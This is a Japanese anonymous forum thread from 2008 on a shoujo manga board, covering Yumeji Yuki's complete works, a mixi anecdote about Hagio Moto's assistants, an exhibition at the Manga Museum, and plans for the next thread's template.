931 :花と名無しさん:2008/06/27(金) 21:47:50 ID:???0
>>927
一迅社が夢路行全集出したね
なんてチャレンジングなんだとw

ハヤカワあたりで文庫化復刊があるかもと期待したんだけど
先に出した文庫があまり売れなかったのかな(´・ω・`)

932 :花と名無しさん:2008/06/27(金) 23:02:35 ID:???O
萩尾望都の「11人いる」に塩センセがアシで行ってた時、同時に臨時アシに駆り出された男性の話が面白い。

mixiの萩尾望都コミュね。

933 :花と名無しさん:2008/06/27(金) 23:10:11 ID:???0
>>931
夢路行全集w
少女漫画において、24年組以外で全作品をカバーしたような
全集出してもらえたのは夢路さんだけだろうな。
なんで出たんだろうと、全巻揃えた今でも謎だw

934 :花と名無しさん:2008/06/30(月) 20:34:47 ID:???0
>>932
mixi会員じゃないものとしては、
「そうですか」としか感想を書きようがないw

その逸話を紹介できないんなら、いちいちココに書き込まなくてもいーんじゃね?

935 :花と名無しさん:2008/07/01(火) 09:38:06 ID:???0
>930
それやったら離婚の時揉めそうw

936 :花と名無しさん:2008/07/01(火) 10:43:58 ID:???0
いらんこと言いなさんな

937 :花と名無しさん:2008/07/01(火) 13:15:03 ID:???0
釣られてmixi見に行ったら削除されてた(´・ω・`)

938 :花と名無しさん:2008/07/01(火) 23:58:08 ID:???0
あれは、トピ主が調子に乗って、自分の日記のようなふるまいを始めて、
そのことに否定的な書き込みが入りだしたところで管理人がスレストした。

939 :花と名無しさん:2008/07/02(水) 11:04:37 ID:???0
どーせ内容の紹介しないんなら、mixi話はやめてくれ
っつか、mixi内でやれよ

940 :花と名無しさん:2008/07/02(水) 22:32:10 ID:???0
せっかくだから、
>>932はその内容を簡単に紹介したらどーですか?
佐藤さんの話なんだし、内容も別に誹謗・中傷ってわけじゃないようだし、
何より話題がないし。w


941 :花と名無しさん:2008/07/03(木) 00:10:26 ID:???0
そういや昔、しりとりしてたよねここ

942 :花と名無しさん:2008/07/15(火) 19:00:11 ID:???0
ちょっと前の記事だけど、『やどり木』の宿脳を連想した
(一目見ただけで、計算も分析もなしで頭に浮かぶってイメージ)

プロ棋士の後頭部に「脳ダコ」? 活性化領域を発見
ttp://www.asahi.com/science/update/0710/TKY200807100362.html

943 :花と名無しさん:2008/07/19(土) 20:37:32 ID:???0
マンガミュージアムに「少女マンガパワー!」展行ってきた。
夢みる惑星の1、2巻の表紙とシリン、マユリの絵が欲しいよ。
パンフレット?は図録になってないし、印刷もイマイチだし。
ハガキあったら絶対買うと思ってたがないし。
作っても元が取れない数なんだろうか・・・
そうそう件のオンデマンド本を売ってた。
佐藤さんのしか覗かなかったけど印刷普通だったよ。

>941
そういえば、しりとり参加してたわ

944 :花と名無しさん:2008/07/21(月) 17:45:11 ID:???0
>943
ありがとう、忘れてた。スケジュール立てないと。

しりとり、参加してました。me, too.

945 :花と名無しさん:2008/07/22(火) 00:46:38 ID:???0
あまりにも話題ないから、
いっそのこと2-7は無視して最初からしりとりするか?w

946 :花と名無しさん:2008/07/22(火) 01:31:07 ID:WQpp/X7p0
いや、それよりも次スレ用にテンプレ修正とかしようよ
既刊リストとか復刊リスト入れたら新規の人が買うかもしれないw

947 :花と名無しさん:2008/07/22(火) 01:37:07 ID:???0
あげちったスマソ


948 :花と名無しさん:2008/07/22(火) 02:41:10 ID:???0
いずれの案にも賛成です

949 :花と名無しさん:2008/08/01(金) 16:58:09 ID:???0
>>946
よし、まかせた!

950 :花と名無しさん:2008/08/19(火) 19:11:20 ID:???0
保守


229 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)